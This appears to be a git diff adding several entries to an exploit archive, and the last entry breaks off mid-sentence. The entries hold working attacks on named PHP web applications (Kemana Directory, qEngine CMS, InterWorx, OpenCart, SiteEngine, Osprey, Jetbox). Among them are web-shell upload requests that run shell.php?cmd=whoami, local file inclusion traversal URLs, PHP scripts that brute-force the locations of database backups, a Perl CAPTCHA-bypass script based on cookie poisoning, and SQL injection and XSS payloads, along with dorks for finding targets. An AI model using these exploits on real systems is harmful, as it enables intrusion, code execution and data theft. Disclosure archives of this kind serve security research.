+ZSL +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_keyword" + +http://www.zeroscience.mk +-----------------------------225222869427624 +Content-Disposition: form-data; name="group_id" + +QBANR +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_body" + +This page is part of qBanner module. Please use qBanner Manager to edit this page. +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_allow_comment" + +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_list" + +-----------------------------225222869427624-- + + +Upload location: http://localhost/kemana/public/image/ +Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami + + + + + #3 (Tools > File Manager > Upload) + +POST http://localhost/kemana/admin/fman/upload_process.php HTTP/1.1 + + +-----------------------------76802486520945 +Content-Disposition: form-data; name="chdir" + +-----------------------------76802486520945 +Content-Disposition: form-data; name="n" + +5 +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_1"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_2"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_3"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_4"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_5"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945-- + + +Upload location: Anywhere within the webroot folder and its subfolders. +Exec: http://localhost/kemana/shell.php?cmd=whoami + + + + + #4 (Contents > Slideshow > Add Entry) + +POST http://localhost/kemana/admin/featured_content.php? HTTP/1.1 + + +-----------------------------9813040432632 +Content-Disposition: form-data; name="AXSRF_token" + +516e6705d27d7d242d948d16b18a6339 +-----------------------------9813040432632 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------9813040432632 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------9813040432632 +Content-Disposition: form-data; name="primary_key" + +idx +-----------------------------9813040432632 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------9813040432632 +Content-Disposition: form-data; name="feat_title" + +Zero Science Lab +-----------------------------9813040432632 +Content-Disposition: form-data; name="feat_img"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------9813040432632 +Content-Disposition: form-data; name="feat_url" + +http://www.zeroscience.mk +-----------------------------9813040432632 +Content-Disposition: form-data; name="feat_text" + +

TEST

+-----------------------------9813040432632-- + + +Upload location: http://localhost/kemana/public/image/ +Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami diff --git a/platforms/php/webapps/32508.txt b/platforms/php/webapps/32508.txt new file mode 100755 index 000000000..471416009 --- /dev/null +++ b/platforms/php/webapps/32508.txt @@ -0,0 +1,47 @@ +? +Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 1.5.6 + +Summary: Experience the ultimate directory script solution +with Kemana. Create your own Yahoo or Dmoz easily with Kemana. +Unique Kemana's features including: CMS engine based on our +qEngine, multiple directories support, user friendly administration +control panel, easy to use custom fields, unsurpassed flexibility. + +Desc: Kemana suffers from an authenticated file inclusion vulnerability +(LFI) when input passed thru the 'run' parameter to task.php is +not properly verified before being used to include files. This can +be exploited to include files from local resources with directory +traversal attacks. + + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5177 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5177.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + +http://localhost/kemana/admin/task.php?run=../../../../../../windows/win.ini diff --git a/platforms/php/webapps/32509.txt b/platforms/php/webapps/32509.txt new file mode 100755 index 000000000..134a74ad8 --- /dev/null +++ b/platforms/php/webapps/32509.txt @@ -0,0 +1,177 @@ + $total) return; + if(empty($start_time)) $start_time=time(); + + $now = time(); + $perc=(double)($done/$total); + $bar=floor($perc*$size); + + $disp=number_format($perc*100, 0); + + $status_bar="\r $disp% ["; + $status_bar.=str_repeat("=", $bar); + if($bar<$size) + { + $status_bar.=">"; + $status_bar.=str_repeat(" ", $size-$bar); + } else + { + $status_bar.="="; + } + + $status_bar.="] $done/$total"; + + $rate = ($now-$start_time)/$done; + $left = $total - $done; + $eta = round($rate * $left, 2); + $elapsed = $now - $start_time; + + $status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec."; + + echo "$status_bar "; + flush(); + + if($done == $total) + { + echo "\n"; + } +} + +print " + @---------------------------------------------------------------@ + | | + | Kemana Directory 1.5.6 Database Backup Disclosure Exploit | + | | + | | + | Copyleft (c) 2014, Zero Science Lab | + | | + | Advisory ID: ZSL-2014-5176 | + | www.zeroscience.mk | + | | + @---------------------------------------------------------------@ + "; + +if ($argc < 4) +{ + print "\n\n [+] Usage: php $argv[0] \n\n"; + print " [+] Example: php $argv[0] zeroscience.mk 80 hercules\n\n"; + die(); +} + +$godina_array = array('2014','2013','2012','2011','2010'); + +$mesec_array = array('12','11','10','09', + '08','07','06','05', + '04','03','02','01'); + +$dn_array = array('31','30','29','28','27','26', + '25','24','23','22','21','20', + '19','18','17','16','15','14', + '13','12','11','10','09','08', + '07','06','05','04','03','02', + '01'); + +$host = $argv[1]; +$port = intval($argv[2]); +$path = $argv[3]; +$dbnm = "Full%20Backup%20"; + +$alert1 = "\033[1;31m"; +$alert2 = "\033[0;37m"; +$alert3 = "\033[1;32m"; + +echo "\n [*] Running checks:\n\n"; + +foreach($godina_array as $godina) +{ + foreach($mesec_array as $mesec) + { + $x++; + status($x, 58); + foreach($dn_array as $dn) + { + $ext=".gz"; + if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/_".$dbnm.$godina.$mesec.$dn."_1".$ext)) + { + echo "\n"; + echo $alert1; + print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n"; + echo $alert2; + print " Filename: '_Full Backup ".$godina.$mesec.$dn."_1".$ext."'\n"; + print " Full URL:\x20"; + echo $alert3; + die("http://".$host.":".$port."/".$path."/admin/backup/_".$dbnm.$godina.$mesec.$dn."_1".$ext."\n\n"); + } + $ext=".sql"; + if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/_".$dbnm.$godina.$mesec.$dn."_1".$ext)) + { + echo "\n"; + echo $alert1; + print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n"; + echo $alert2; + print " Filename: '_Full Backup ".$godina.$mesec.$dn."_1".$ext."'\n"; + print " Full URL:\x20"; + echo $alert3; + die("http://".$host.":".$port."/".$path."/admin/backup/_".$dbnm.$godina.$mesec.$dn."_1".$ext."\n\n"); + } + } + } +} + +print "\n\n [*] Zero findings!\n\n\n"; + +?> diff --git a/platforms/php/webapps/32510.txt b/platforms/php/webapps/32510.txt new file mode 100755 index 000000000..63adeb7d1 --- /dev/null +++ b/platforms/php/webapps/32510.txt @@ -0,0 +1,103 @@ +?#!C:\Perl64\bin\perl.exe +# +# Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit +# +# +# Vendor: C97net +# Product web page: http://www.c97.net +# Affected version: 1.5.6 +# +# Summary: Experience the ultimate directory script solution with Kemana. +# Create your own Yahoo or Dmoz easily with Kemana. Unique Kemana's features +# including: CMS engine based on our qEngine, multiple directories support, +# user friendly administration control panel, easy to use custom fields, +# unsurpassed flexibility. +# +# Desc: The CAPTCHA function for Kemana Directory is prone to a security +# bypass vulnerability that occurs in the CAPTCHA authentication routine. +# The function 'qvc_init()' in '/includes/function.php' sets a cookie with +# a SHA1-based hash value in the Response Header which can be replaced by +# a random SHA1 computed hash value using Cookie Poisoning attack. Successful +# exploit will allow attackers to bypass the CAPTCHA-based authentication +# challenge and perform brute-force attacks. +# +# +# ============================================================================= +# /includes/function.php: +# ----------------------- +# +# 1774: /*------- ( QVC - VISUAL CONFIRMATION FUNCTIONS aka CAPTCHA ) ------- */ +# 1775: +# 1776: +# 1777: // qVC - the simplest visual confirmation engine yet +# 1778: // use qvc_init() --> --> compare qvc_value() == sha1 (strtolower($user_input) )? +# 1779: // qVC uses db to communicate with visual.php, then set user cookie using sha1, then db not used! +# 1780: // $num = either 3 or 5, 3 => only 0-9, 5 => 0-F +# 1781: function qvc_init ($num = 5) +# 1782: { +# 1783: if ($num == 3) +# 1784: $value = mt_rand (100, 999); +# 1785: else +# 1786: $value = random_str (5); +# 1787: ip_config_update ('visual', $value); +# 1788: setcookie ('qvc_value', sha1 ($value), 0, '/'); +# 1789: } +# 1790: +# 1791: +# 1792: // return qvc value (it's sha1'd, so be sure to compare with sha1'd value) +# 1793: function qvc_value () +# 1794: { +# 1795: $correct_val = cookie_param ('qvc_value'); +# 1796: +# 1797: // block browser BACK +# 1798: qvc_init (); +# 1799: return $correct_val; +# 1800: } +# ============================================================================= +# +# +# Tested on: Microsoft Windows 7 Professional SP1 (EN) +# Apache/2.4.7 (Win32) +# PHP/5.5.6 +# MySQL 5.6.14 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2014-5175 +# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5175.php +# +# +# Dork #1: intitle:powered by c97.net +# Dork #2: intitle:powered by qEngine +# Dork #3: intitle:powered by Kemana.c97.net +# Dork #4: intitle:powered by Cart2.c97.net +# +# +# 08.03.2014 +# + + +use LWP::UserAgent;use HTTP::Cookies;use HTTP::Request::Common;use Digest::SHA;info();#2014-03 +$url="http://localhost/kemana/admin/login.php";$domain="localhost.local";$juzer="admin";$pass= +"admin";$cookie_jar=HTTP::Cookies->new();$ua=LWP::UserAgent->new;$ua->cookie_jar($cookie_jar); +print" [*] Sending request.\n";sleep(1);$request=GET $url;$response=$ua->request($request);#$_ +print" [*] Reading cookie from Response Headers.\n";$cookie_jar->extract_cookies($response);#1 +print" [*] ".$cookie_jar->as_string();sleep(1);$kuki=$cookie_jar->as_string;($regexp)=$kuki#]. +=~/qvc_value=(.*?);/;print" [*] Got CAPTCHA: ".$regexp."\n";$sha=Digest::SHA->new();$data=#("; +"joxypoxy";$sha->add($data);$digest=$sha->hexdigest;print" [*] Poisoning with: ".$digest."\n"; +$cookie_jar->set_cookie(0,'qvc_value',$digest,'/',$domain);print" [*] ".$cookie_jar->as_string +;sleep(1);print" [*] Sending login credentials.\n";$postche=$ua->request(POST $url,[user_id=>$ +juzer,user_passwd=>$pass,visual=>$data]);print"\n";$check=$postche->as_string;if($check=~#get; +"HTTP/1.1 302 Found"){print" [*] CAPTCHA bypassed!\n";}else{print" [!] Didn\'t work.\n";}sub#\ +info(){print" + +-----------------------------------------------------+ + | | + | Kemana Directory CAPTCHA Bypass PoC Exploit | + | | + | ID: ZSL-2014-5175 | + | | + +-----------------------------------------------------+ + \n\n";} diff --git a/platforms/php/webapps/32511.txt b/platforms/php/webapps/32511.txt new file mode 100755 index 000000000..9124bdd9a --- /dev/null +++ b/platforms/php/webapps/32511.txt @@ -0,0 +1,514 @@ + $total) return; + if(empty($start_time)) $start_time=time(); + + $now = time(); + $perc=(double)($done/$total); + $bar=floor($perc*$size); + + $disp=number_format($perc*100, 0); + + $status_bar="\r $disp% ["; + $status_bar.=str_repeat("=", $bar); + if($bar<$size) + { + $status_bar.=">"; + $status_bar.=str_repeat(" ", $size-$bar); + } else + { + $status_bar.="="; + } + + $status_bar.="] $done/$total"; + + $rate = ($now-$start_time)/$done; + $left = $total - $done; + $eta = round($rate * $left, 2); + $elapsed = $now - $start_time; + + $status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec."; + + echo "$status_bar "; + flush(); + + if($done == $total) + { + echo "\n"; + } +} + +print " + @---------------------------------------------------------------@ + | | + | qEngine CMS 6.0.0 Database Backup Disclosure Exploit | + | | + | | + | Copyleft (c) 2014, Zero Science Lab | + | | + | Advisory ID: ZSL-2014-5172 | + | www.zeroscience.mk | + | | + @---------------------------------------------------------------@ + "; + +if ($argc < 4) +{ + print "\n\n [+] Usage: php $argv[0] \n\n"; + print " [+] Example: php $argv[0] zeroscience.mk 80 hercules\n\n"; + die(); +} + +$godina_array = array('2014','2013','2012','2011','2010'); + +$mesec_array = array('12','11','10','09', + '08','07','06','05', + '04','03','02','01'); + +$dn_array = array('31','30','29','28','27','26', + '25','24','23','22','21','20', + '19','18','17','16','15','14', + '13','12','11','10','09','08', + '07','06','05','04','03','02', + '01'); + +$host = $argv[1]; +$port = intval($argv[2]); +$path = $argv[3]; +$dbnm = "Full%20Backup%20"; + +$alert1 = "\033[1;31m"; +$alert2 = "\033[0;37m"; +$alert3 = "\033[1;32m"; + +echo "\n [*] Running checks:\n\n"; + +foreach($godina_array as $godina) +{ + foreach($mesec_array as $mesec) + { + $x++; + status($x, 58); + foreach($dn_array as $dn) + { + $ext=".gz"; + if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext)) + { + echo "\n"; + echo $alert1; + print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n"; + echo $alert2; + print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n"; + print " Full URL:\x20"; + echo $alert3; + die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n"); + } + $ext=".sql"; + if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext)) + { + echo "\n"; + echo $alert1; + print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n"; + echo $alert2; + print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n"; + print " Full URL:\x20"; + echo $alert3; + die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n"); + } + } + } +} + +print "\n\n [*] Zero findings!\n\n\n"; + +?> + +####################################################################################### + + +qEngine CMS 6.0.0 (task.php) Local File Inclusion Vulnerability + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 6.0.0 and 4.1.6 + +Summary: qEngine (qE) is a lightweight, fast, yet feature packed +CMS script to help you building your site quickly. Using template +engine to separate the php codes from the design, you don't need +to touch the codes to design your web site. qE is also expandable +by using modules. + +Desc: qEngine CMS suffers from an authenticated file inclusion +vulnerability (LFI) when input passed thru the 'run' parameter to +task.php is not properly verified before being used to include files. +This can be exploited to include files from local resources with +directory traversal attacks. + + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5173 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5173.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + +http://localhost/qe6_0/admin/task.php?run=../../../../../../windows/win.ini + +#########################################################################? + + +qEngine CMS 6.0.0 Remote Code Execution + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 6.0.0 and 4.1.6 + +Summary: qEngine (qE) is a lightweight, fast, yet feature packed +CMS script to help you building your site quickly. Using template +engine to separate the php codes from the design, you don't need +to touch the codes to design your web site. qE is also expandable +by using modules. + +Desc: qEngine CMS suffers from an authenticated arbitrary code +execution. The vulnerability is caused due to the improper verification +of uploaded files in several modules thru several POST parameters. +This can be exploited to execute arbitrary PHP code by uploading +a malicious PHP script file that will be stored in '/public/image' +directory. Minimum permissions needed for a user to upload any file: + +User level: Regular (param: user_level=1) +Admin level: Editor (param: admin_level=3) + +Only the 'Super Admin' level makes the Tool 'File Manager' available. + + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5174 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5174.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + + #1 (Modules > qBanner > Manage Banner > Add Entry) + +POST http://localhost/qe6/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1 + + +-----------------------------225222869427624 +Content-Disposition: form-data; name="AXSRF_token" + +52e9c9ff9bb251a144b82a662496f5b8 +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------225222869427624 +Content-Disposition: form-data; name="primary_key" + +page_id +-----------------------------225222869427624 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_title" + +ZSL +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_keyword" + +http://www.zeroscience.mk +-----------------------------225222869427624 +Content-Disposition: form-data; name="group_id" + +QBANR +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_body" + +This page is part of qBanner module. Please use qBanner Manager to edit this page. +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_allow_comment" + +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_list" + +-----------------------------225222869427624-- + + +Upload location: http://localhost/qe6/public/image/ +Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami + + + + + #2 (Tools > File Manager > Upload) + +POST http://localhost/qe6/admin/fman/upload_process.php HTTP/1.1 + + +-----------------------------76802486520945 +Content-Disposition: form-data; name="chdir" + +-----------------------------76802486520945 +Content-Disposition: form-data; name="n" + +5 +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_1"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_2"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_3"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_4"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_5"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945-- + + +Upload location: Anywhere within the webroot folder and its subfolders. +Exec: http://localhost/qe6/shell.php?cmd=whoami + + + + + #3 (Modules > Slideshow > Manage Slides > Add Entry) + +POST http://localhost/qe6/admin/task.php?mod=slideshow&run=edit.php& HTTP/1.1 + + +-----------------------------23201806221528 +Content-Disposition: form-data; name="AXSRF_token" + +52e9c9ff9bb251a144b82a662496f5b8 +-----------------------------23201806221528 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------23201806221528 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------23201806221528 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------23201806221528 +Content-Disposition: form-data; name="primary_key" + +page_id +-----------------------------23201806221528 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_title" + +ZSL +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_keyword" + +http://www.zeroscience.mk +-----------------------------23201806221528 +Content-Disposition: form-data; name="group_id" + +SSHOW +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_body" + +This page is part of SlideShow module. Please use SlideShow Manager to edit this page. +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_allow_comment" + +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_list" + +-----------------------------23201806221528-- + + +Upload location: http://localhost/qe6/public/image/ +Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami + + + + + #4 (Contents > Manage Categories > Add Entry) + +POST http://localhost/qe6/admin/page_cat.php? HTTP/1.1 + + +-----------------------------205172563220150 +Content-Disposition: form-data; name="AXSRF_token" + +3afa0c7483889ac54d7b6afa4083a9a2 +-----------------------------205172563220150 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------205172563220150 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------205172563220150 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------205172563220150 +Content-Disposition: form-data; name="primary_key" + +idx +-----------------------------205172563220150 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------205172563220150 +Content-Disposition: form-data; name="group_id" + +GENPG +-----------------------------205172563220150 +Content-Disposition: form-data; name="parent_id" + +1 +-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_name" + +ZSL +-----------------------------205172563220150 +Content-Disposition: form-data; name="permalink" + +-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_details" + +

Zero Science Lab

+-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------205172563220150-- + + +Upload location: http://localhost/qe6/public/image/ +Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami + + diff --git a/platforms/php/webapps/32516.txt b/platforms/php/webapps/32516.txt new file mode 100755 index 000000000..a9483865b --- /dev/null +++ b/platforms/php/webapps/32516.txt @@ -0,0 +1,72 @@ +================================================= +Title: SQL injection in InterWorx Control Panel +Product: InterWorx Web Control Panel +Vendor: InterWorx LLC +Tested Version: 5.0.13 build 574 +Vulnerability Type: SQL Injection [CWE-89] +CVE Reference: CVE-2014-2531 +Solution Status: Fixed in Version 5.0.14 build 577 +Discovered and Provided: Eric Flokstra +================================================= + +About the Vendor: +------------------------- +The InterWorx Hosting Control Panel is a web hosting and linux server +management system that provides tools for server administrators to +command their servers and for end users to oversee the operations of +their website. + +Advisory Details: +----------------------- +SQL injection vulnerability in the InterWorx Web Control Panel. + +The InterWorx application stores its data in a MySQL-database. For +interaction with the database dynamic queries are used. These queries +are created by concatenating strings from the application with user +input. However, the application does not perform proper validation or +escaping of the supplied input in the 'i' parameter when sorting user +accounts in NodeWorx, Siteworx and Resellers. Malicious users with +access to this functionality can manipulate database queries to +achieve other goals than the developers had in mind. + +The following requests can be used as proof of concept and demonstrate +that user input is concatenated into a database query without proper +validation or escaping. The payload in the first request checks +whether the letter 'm' is the first letter of the database version. +Since the database in use is MySQL this condition is true and the +table is sorted by column 'nu.email'. If the condition is false +(request 2/letter t) the table is sorted by column 'nu.nickname'. + +Request 1: +--------------- +POST /xhr.php HTTP/1.1 +Host: some.host.com:1234 +".." + +i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='m')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}} + +Request 2: +--------------- +POST /xhr.php HTTP/1.1 +Host: some.host.com:1234 +".." + +i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='t')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}} + +Vendor contact timeline: +--------------------------------- +21 Feb 2014: Vendor notification +21 Feb 2014: Vulnerability confirmation +17 Mar 2014: Issue patched +25 Mar 2014: Public disclosure + +Solution: +------------ +Upgrade to the latest version (5.0.14 build 577) of InterWorx Web Control Panel. + +References: +----------------- +[1] InterWorx Beta Channel - +http://forums.interworx.com/threads/8000-InterWorx-Version-5-0-14-Released-on-Beta-Channel! +[2] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org +[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org \ No newline at end of file diff --git a/platforms/php/webapps/32520.txt b/platforms/php/webapps/32520.txt new file mode 100755 index 000000000..5d4c89a21 --- /dev/null +++ b/platforms/php/webapps/32520.txt @@ -0,0 +1,50 @@ +# Exploit Title : OpenCart <= 1.5.6.1 SQL Injection +# Date : 2014/3/26 +# Exploit Author : Saadat Ullah ? saadi_linux@rocketmail.com +# Software Link : http://www.opencart.com/index.php?route=download/download + : https://github.com/opencart +# Software web : www.opencart.com +# Author HomePage : http://security-geeks.blogspot.com/ +# Tested on: Server : Apache/2.2.15 PHP/5.3.3 + +#Opencart suffers from multipe SQL injection in ebay.php the bug is more about +privilege escalation as attacker may need openbay module access . + +Poc +Poorly coded file full of SQLi opencart/system/library/ebay.php +In file opencart/system/library/ebay.php +product_id is used in a SQL query without being sanitize. + +public function getEbayItemId($product_id) { + $this->log('getEbayItemId() - Product ID: '.$product_id); + + $qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1"); +.............. +Function is called on many locations and paramter is passed without santize. +In opencart\admin\controller\openbay\openbay.php +public function editLoad() { + ... + $item_id = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']); +.............. +Where $this->request->get['product_id'] comming from GET field. +Similarly More + +public function isEbayOrder($id) { + ... + $qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1"); + +In opencart\admin\controller\extension\openbay.php + public function ajaxOrderInfo() + ... + if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){ +.............. +More +public function getProductStockLevel($productId, $sku = '') { + ... + $qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1"); +.............. +ebay.php has many more.. +User should have openbay module access +http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1' + +#Independent Pakistani Security Researcher \ No newline at end of file diff --git a/platforms/php/webapps/32521.txt b/platforms/php/webapps/32521.txt new file mode 100755 index 000000000..f3681451a --- /dev/null +++ b/platforms/php/webapps/32521.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/31883/info + +Osprey is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to compromise the application and the underlying computer; other attacks are also possible. + +Osprey 1.0a4.1 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?lib_dir=[shell] +http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?xml_dir=[shell] \ No newline at end of file diff --git a/platforms/php/webapps/32523.txt b/platforms/php/webapps/32523.txt new file mode 100755 index 000000000..bd2dc67f1 --- /dev/null +++ b/platforms/php/webapps/32523.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31888/info + +SiteEngine is prone to a remote URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. + +A successful exploit may aid in phishing-style attacks. + +SiteEngine 5.0 is vulnerable; other versions may also be affected. + +http://www.example.com/api.php?action=logout&forward=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/32524.txt b/platforms/php/webapps/32524.txt new file mode 100755 index 000000000..c4730e37c --- /dev/null +++ b/platforms/php/webapps/32524.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31889/info + +SiteEngine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +SiteEngine 5.0 is vulnerable; other versions may also be affected. + +http://www.example.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/* \ No newline at end of file diff --git a/platforms/php/webapps/32525.txt b/platforms/php/webapps/32525.txt new file mode 100755 index 000000000..c8dfca3eb --- /dev/null +++ b/platforms/php/webapps/32525.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31890/info + +Jetbox CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Jetbox CMS 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/postlister/index.php?liste=default%22%3E%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32526.txt b/platforms/php/webapps/32526.txt new file mode 100755 index 000000000..4603fb5eb --- /dev/null +++ b/platforms/php/webapps/32526.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31898/info + +ClipShare Pro is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the 